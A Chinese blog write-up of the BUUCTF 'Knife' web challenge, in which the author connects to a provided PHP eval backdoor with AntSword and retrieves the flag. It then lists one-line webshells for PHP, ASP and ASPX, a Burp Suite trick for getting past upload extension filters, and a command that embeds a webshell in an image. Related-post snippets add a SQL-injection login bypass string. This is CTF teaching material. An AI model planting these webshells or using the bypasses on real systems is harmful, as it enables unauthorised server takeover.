BUUCTF [极客大挑战 2019]Knife

最新推荐文章于 2024-09-10 18:34:04 发布
最新推荐文章于 2024-09-10 18:34:04 发布
阅读量736 收藏
点赞数 1
分类专栏: Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CrotZZ/article/details/118491851
版权
CTF 同时被 2 个专栏收录
18 篇文章 1 订阅
订阅专栏
Web
16 篇文章 0 订阅
订阅专栏

在这里插入图片描述
打开一看结合题目,就是连接一下菜刀蚁剑,菜刀没用过只有蚁剑,下面用蚁剑实现
在这里插入图片描述
设置好URL和链接密码
在这里插入图片描述
找到flag文件
在这里插入图片描述
打开后找到flag

文件上传漏洞

一句话木马:
php

<?php echo @eval($_POST['shell']);?>

Asp
<%execute(request(“value”))%>
Aspx
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>

前端判断文件后缀名可以Burp Suite配置好Proxy -> Options,并在Proxy->Intercept->Intercept is on,浏览器设置代理为Options中的配置,先把shell.php后缀改为jpg,然后提交,再filename中把文件shell.jpg后缀改为shell.php

图片马
一般直接上传木马文件都会被过滤拦截,这时候就需要用到图片马。
所谓图片马,就是将一句话木马与图片相结合,使得图片中包含代码。
制作:
一个正常图片,一个木马文件,内容为php一句话木马,在命令框里
copy pic.jpg/b + php木马.php/a webshell.jpg生成图片马

维多利亚蜜汁鱼
关注
专栏目录
BUUCTF knife
zoixsoadji的博客
03-14 419
进入题目 页面上面有一段一句话木马,根据题目,直接想到上传一句话木马 用hackbar在user agent中写入一段一句话木马 接下来就是按照题目提示用菜刀连接木马了 这里我用的是中国蚁剑,我感觉比中国菜刀好用 中国蚁剑可以在guthub上下载 接下来就到根目录下去查找flag 得到flag ...
[BUUCTF012][极客挑战 2019]Knife 1
m0_52674595的博客
12-04 2368
[BUUCTF012] [极客挑战 2019]Knife 1 看到题目 knife 第一反应 猜测可能是中国菜刀题 进来一看 eval($_POST["Syc"]); 这是一个典型的后门程序 //eval — 把字符串bai作为PHP代码执行 eval('echo 123;');//输出123 有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST[‘posha’]的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码
BUUCTF Web [极客挑战 2019]Knife
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [极客挑战 2019]Knife一、题目简介二、思路分析1)一句话木马2)代码执行三、解题步骤1)目录遍历2)查看文件内容四、总结 一、题目简介 页面中的文字提示我们使用「菜刀」连接后门,什么!你没有菜刀?恭喜你,你来对地方了,网上大部分的答案都是直接上菜刀连后门,实际上不使用.
2024.9.9(极客挑战 2019]EasySQL,[极客挑战 2019]Knife
最新发布
2201_75556700的博客
09-10 217
2、遇到这样的登录界面,先尝试admin和万能密码(1' or 1=1#),拿到flag。3、打开蚁剑,空白处右键,选择添加数据,输入题目地址和连接密码。2、打开菜刀或者蚁剑,进行连接,这里我是用蚁剑。题目一:极客挑战 2019]EasySQL。题目二:[极客挑战 2019]Knife。5、双击链接,找到根目录,下滑找到flag。1、点开题目链接,来到下面的界面。1、点开链接,来到下面的页面。4、点击添加,成功添加。6、双击flag文件夹。
BUUCTF[极客挑战 2019]Knife
jemus17的博客
05-23 324
一句话木马本质上是利用了「代码执行」函数,将 post 请求的参数传递到 eval() 中执行,我们完全可以修改 post 请求的参数来执行代码。恭喜你,你来对地方了,网上大部分的答案都是直接上菜刀连后门,实际上不使用菜刀也能拿到 flag。根据页面中的文字提示可知,作者为我们准备好了「一句话木马」,并委婉的提示,使用「菜刀」连接。这一关是「代码执行」漏洞推荐使用。在根目录下发现有个flag文件。页面中的文字提示我们使用。写上地址和密码:Syc。题目叫菜刀,就用它吧。
BUUCTF WEB [极客挑战 2019]Knife
Y1da的博客
04-16 289
BUUCTF WEB [极客挑战 2019]Knife 根据提示直接使用蚁剑连接 在文件根目录中找到flag文件,获得flag flag{b297ceda-a835-48bb-acf9-2a6c03f68d32}
[极客挑战 2019]Knife 1(蚁剑连接/安装)
weixin_45253573的博客
11-18 849
打开环境 eval($_POST[“Syc”]); 作为后门用post提交一个字符串Syc 直接拿蚁剑连接 连接之后在根目录下发现了flag 获取flag 介绍一下蚁剑的安装: AntSword-Loader:https://github.com/AntSwordProject/AntSword-Loader antSword:https://github.com/AntSwordProject/antSword 这两个下载好之后解压 在AntSword-Loader-v4.0.3-win32
buu[极客挑战 2019]Knife 1
hintll的博客
03-23 398
[极客挑战 2019]Knife 打开靶机后: ‘ 直接看到一个提示:白给的shell eval($_POST[“Syc”]); 推测有一个后门shell 中国蚁剑直接连接看一下 连接成功: 在根目录下直接找到flag
BUUCTF web 极客挑战 2019
菜的只能随便写写博客
04-01 1818
0x01 Secret File  在源码之中得到一个php页面  后面页面之中  根据提示抓包,在其中返回的页面得到了信息  得到源码,根据源码,发现存在文件包含漏洞  利用php伪协议,获取flag.php的信息,拿取flag payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php EasyS...
[极客挑战 2019]Knife 1
weixin_45674567的博客
05-29 2930
白给的shell,用蚁剑 蚁剑下载 点击进去,左边查看目录 点击获取
BUUCTF [极客挑战 2019] Knife
Senimo
10-18 321
BUUCTF [极客挑战 2019] Knife 启动靶机,打开环境: 题目提示为菜刀,并且给出了一句话木马 直接使用中国蚁剑连接即可: flag在根目录下:
BUUCTF】[极客挑战 2019]Knife Writeup
algae
08-23 432
flag{bbfff7f8-7c63-4dc2-bd28-64a75585d2cf}
CTF_EXP06:BUUCTF [极客挑战 2019] Knife
Senimo
10-18 726
CTF_EXP06:BUUCTF [极客挑战 2019] Knife 启动靶机,打开环境: 题目提示为菜刀,并且给出了一句话木马 直接使用中国蚁剑连接即可: flag在根目录下: 非常基础的一道题,首次使用Python尝试一句话木马连接 首先来看一句话木马结构: <?php @eval($_POST['attack']) ?> 使用POST传参方式,参数名为:attack 获取到参数后,将整个$_POST['attack']的内容替换为传入的值 @eval()把字符串当成PHP代码执
BUUCTF:[极客挑战 2019]Knife
末初的CSDN博客
10-20 674
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Knife 蚁剑连接,根目录发现flag
CTF题 BUUCTF之[极客挑战 2019]Knife 1
weixin_44632787的博客
06-17 3679
CTF题 BUUCTF之[极客挑战 2019]Knife 1 启动我们的挑战项目 这里的题目简直就是在提示我们用中国菜刀连接,但是由于个人习惯这里我就用中国蚁剑来连接了。(其实中国蚁剑和中国菜刀的功能差不多,不过个人感觉蚁剑更好用一些吧)。 现在来打开我们的蚁剑工具 然后填上我们的连接和密码:Syc 然后进入到对方的登录后台 最后到这个后台的根目录下就可以找到flag值 如果你不能一下子就看出来是用蚁剑这些工具来连接,那可能是因为你做题的经验还不够。做多了自然而然就能想到了。总的来说,这题属于
CTF-Web-[极客挑战 2019]Knife
归子莫的博客
05-03 5844
CTF-Web-[极客挑战 2019]Knife 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]Knife 打开题目的实例 思路 看到这种题目,首先到处点一点,看...
BUUCTF_[极客挑战 2019]Knife解题思路
时光不老的博客
01-10 485
[极客挑战 2019]Knife
Springboot整合Knife4j快速实现API文档管理
它主要为前后端分离的项目提供了一个强大的API文档展示和测试平台,通过友好的用户界面,可以极大地提升前后端开发的效率。 知识点三:Spring Boot 集成 Knife4j 在Spring Boot项目中集成Knife4j,首先需要在项目中...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值